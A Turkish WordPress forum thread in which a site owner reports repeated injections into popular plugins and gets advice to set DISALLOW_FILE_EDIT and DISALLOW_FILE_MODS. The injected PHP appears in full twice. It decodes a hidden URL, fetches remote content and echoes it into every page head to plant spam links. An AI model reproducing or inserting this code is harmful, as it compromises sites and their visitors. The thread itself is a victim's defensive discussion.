Plugin Klasörüne Erişim

28-03-2023, 23:15:38

Birisi Wordpress plugin klasörüme erişim sağlayıp dosyalara şu şekilde kod ekliyor. Bu kod da sayfaya *****, casino sitesi linki veriyor.

Bunu özellikle her sayfada kullanılan eklentilere yapıyor. Bunu engelleyebilmek için ne yapmamı tavsiye edersiniz. Şifrelerim güçlü.

function wordpress_optionsxx() {
$url = "aHR0cHM6Ly95b2FzdC1zY2hlbWEtZ3JhcGguY29tL2NvZ GU/eD00NTg=";
$url = base64_decode($url);
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
curl_close($ch);
}elseif (function_exists('file_get_contents')) {
$output = file_get_contents($url);
}elseif (function_exists('file')) {
$output = implode('', file($url));
}
echo $output;
}
add_action('wp_head', 'wordpress_optionsxx');

28-03-2023, 23:17:52

#2

yusok32

Kullandığınız eklentileri kontrol etmeniz lazım hocam

28-03-2023, 23:19:32

#3

anonimbakkal

yusok32 adlı üyeden alıntı: mesajı görüntüle

Kullandığınız eklentileri kontrol etmeniz lazım hocam

Hocam eklentilerin hepsi Wordpress'te Yüzbinlerce kullanılan eklentiler. Mesela klasik düzenleyici veya Tablo of Content Plus.

28-03-2023, 23:27:25

#4

ibrahim_ozt

anonimbakkal adlı üyeden alıntı: mesajı görüntüle

Birisi Wordpress plugin klasörüme erişim sağlayıp dosyalara şu şekilde kod ekliyor. Bu kod da sayfaya *****, casino sitesi linki veriyor.

Bunu özellikle her sayfada kullanılan eklentilere yapıyor. Bunu engelleyebilmek için ne yapmamı tavsiye edersiniz. Şifrelerim güçlü.

function wordpress_optionsxx() {
$url = "aHR0cHM6Ly95b2FzdC1zY2hlbWEtZ3JhcGguY29tL2NvZ GU/eD00NTg=";
$url = base64_decode($url);
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
curl_close($ch);
}elseif (function_exists('file_get_contents')) {
$output = file_get_contents($url);
}elseif (function_exists('file')) {
$output = implode('', file($url));
}
echo $output;
}
add_action('wp_head', 'wordpress_optionsxx');

bu plugin yoast mı hocam ?

28-03-2023, 23:30:35

#5

anonimbakkal

yusok32 adlı üyeden alıntı: mesajı görüntüle

Kullandığınız eklentileri kontrol etmeniz lazım hocam

ibrahim_ozt adlı üyeden alıntı: mesajı görüntüle

bu plugin yoast mı hocam ?

Hocam önce "Klasik Düzenliyici "dosyasına eklenmiştir. Silip yeniden yükledim eklentiyi bu gitti.

İki gün sonra "Table of Content Plus" plugin içerisinde ana dosyanın en altına eklenmiş bu sefer.

28-03-2023, 23:34:24

#6

Misafir

Merhabalar. Wp config dosyasına tema dosyalarını editleme engeli ve plugin ekleme engeli kodu eklemeniz lazım. Plugin sayfasından kolayca shell sokulabiliyor. Şuan mobilim adı biraz uzun hatırlamıyorum define olarak ekleniyor 2 satır.

Alıntı

define( 'DISALLOW_FILE_EDIT', true );
define( 'DISALLOW_FILE_MODS', true );

28-03-2023, 23:37:49

#7

anonimbakkal

Misafir adlı üyeden alıntı: mesajı görüntüle

Merhabalar. Wp config dosyasına tema dosyalarını editleme engeli ve plugin ekleme engeli kodu eklemeniz lazım. Plugin sayfasından kolayca shell sokulabiliyor. Şuan mobilim adı biraz uzun hatırlamıyorum define olarak ekleniyor 2 satır.

define( 'DISALLOW_FILE_EDIT', true );

Şunu buldum nette hocam? Bu yeterli mi?

Bir de bunu buldumç

# Plugin Dosyası düzenlemeyi engellemek. Hacklink engellemek için eklendi
define( 'DISALLOW_FILE_MODS', true );

28-03-2023, 23:40:02

#8

Misafir

İkisinide ekleyin biri tema biri plugin için iki taraftanda giriliyor

anonimbakkal bunu beğendi.

1 kişi bunu beğendi.

28-03-2023, 23:40:33

#9

anonimbakkal

Misafir adlı üyeden alıntı: mesajı görüntüle

Merhabalar. Wp config dosyasına tema dosyalarını editleme engeli ve plugin ekleme engeli kodu eklemeniz lazım. Plugin sayfasından kolayca shell sokulabiliyor. Şuan mobilim adı biraz uzun hatırlamıyorum define olarak ekleniyor 2 satır.

Çok teşekkür ederim yardımınız için